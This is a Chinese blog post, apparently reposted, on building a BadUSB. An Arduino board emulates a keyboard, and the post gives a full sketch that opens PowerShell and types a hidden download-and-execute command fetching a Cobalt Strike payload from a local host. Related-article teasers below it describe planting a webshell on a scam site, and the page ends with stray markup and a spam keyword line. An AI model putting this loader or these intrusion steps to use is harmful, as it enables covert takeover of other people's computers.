<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次失敗的badusb制作

    VSole2021-07-17 19:25:03

    最近有個大佬問了我關于badusb的事情。所有想出一期badusb的教程(其實本來已經寫好了一半了的,但是中途我設備壞了。重啟電腦導致沒保存)QAQ



    本來想出一期不一樣的badusb(自己設計的payload),但無奈我的badusb壞了。驗證不了我自己的payload。所有........求各位輕點噴。


    其實我們所說的badusb就是利用usb協議的漏洞去模擬鍵盤,它只是arduino的開發板。



    首先我們打開cs設置監聽并生成powershell的payload

    然后我們打開arduino把代碼和payload燒進去

    這里有幾點需要注意:

    1)在燒錄前需要關閉虛擬機,因為燒錄過程會反復識別設備,虛擬機的設備掃描會阻塞燒錄進行導致失敗。

    2)在燒錄前選好對應的開發板型號和端口。

    3)

    以下是具體代碼:

    void setup() {

    Keyboard.begin();//啟動鍵盤模擬

    delay(5000);//延遲5000毫秒

    Keyboard.press(KEY_LEFT_GUI);//按下win鍵

    delay(500);

    Keyboard.press('r');//按下r鍵

    delay(500);

    Keyboard.release('r'); //放開r鍵

    Keyboard.release(KEY_LEFT_GUI);

    Keyboard.press(KEY_CAPS_LOCK);//打開大寫鎖定,防止中文輸入法

    Keyboard.release(KEY_CAPS_LOCK);

    delay(500);

    Keyboard.println("POWERSHELL");//打開powershell

    delay(500);

    Keyboard.releaseAll();//放開所有按鍵

    Keyboard.println("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.104:80/a'))\"");//導入payload并運行

    delay(3000);

    }

    電腦payload
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    1.漏洞背景在群里閑聊時,看到顏夏大佬在打詐騙站,由于是虛擬機主機就直接刪站掛黑頁了(裝裝逼嘛)接下來輪到我了,首先信息收集一波找到了旁站,隨便打開一個弱口令進入后臺找到上傳點:上傳shell上傳失敗嘗試使用圖片馬,改成php試試這就很神奇了估計判斷了文件頭好家伙報錯后臺找到一個文件管理器,權限還蠻大的~這里可以直接創建webshell文件那我直接找找之前上傳的馬子先嘗試編輯好家伙直接空的填寫一下
    King-Hacking介紹以前我們都是把看到合適的,喜歡的全部下載在電腦上,但慢慢的發現,99%的安全工具下載后都是閑置的,常用的就那么幾款,今天發現這個小腳本,它列出了一些常用的分類并收集了常用的滲透測試工具列表,你喜歡哪個進去選擇就行,然后它會自動給你下載回來。需要注意的是,它默認下載位置是用戶名下,而不是當前目錄下。
    一次失敗的badusb制作
    2021-07-17 19:25:03
    最近有個大佬問了我關于badusb的事情。重啟電腦導致沒保存)QAQ本來想出一期不一樣的badusb,但無奈我的badusb壞了。
    整個過程僅講思路的實現,因筆者日常工作并不相關,從構思到實現,前前后后大概花了兩個月時間,未對數據進行整理,也未列出具體的步驟,僅供研究與參考,思路如有雷同,那真是太好了
    論0day抓取的姿勢
    2022-07-07 22:17:50
    提供該漏洞細節或者利用程序的人通常是該漏洞的發現者。一般攻擊路徑都是通過互聯網進行,那么我們利用屬于DMZ區的一臺服務器上搭建一個docker漏洞環境,然后通過falco進行CONTAINER內執行命令的監控,在互聯網側通過packetbeat進行HTTP的payload的的捕獲。
    分享一個略水但挺有意思的漏洞挖掘過程:ESP8266 wifi killer固件zhangguanzhang漢化版web ui界面wifi名字存在xss注入
    在一些開啟了 Hyper-V 的電腦上,RouterOS 可能無法在 VMWare Workstation 中模擬運行或啟動非常緩慢,如果遇到無法運行的情況,請酌情考慮關閉 Hyper-V,如果能成功運行但是啟動緩慢,可以及時拍攝快照。
    并且在確認時可以看到交易細節,因此不會貿然確認向其他人轉賬的信息。常規登錄程序接管。該瀏覽器擴展使用本機消息將請求從網站轉發到應用程序,并將響應發送回網頁。當此類事件發生時,應用程序將指示擴展調用頁面上已注冊的回調函數。此漏洞允許將tabid的任何值注入到響應中。總之,所有韓國銀行網站似乎都嚴重依賴jQuery,這及易產生攻擊。因此,這種攻擊允許惡意網站破壞任何依賴TouchEn擴展的網站。韓國銀行強制用戶安
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类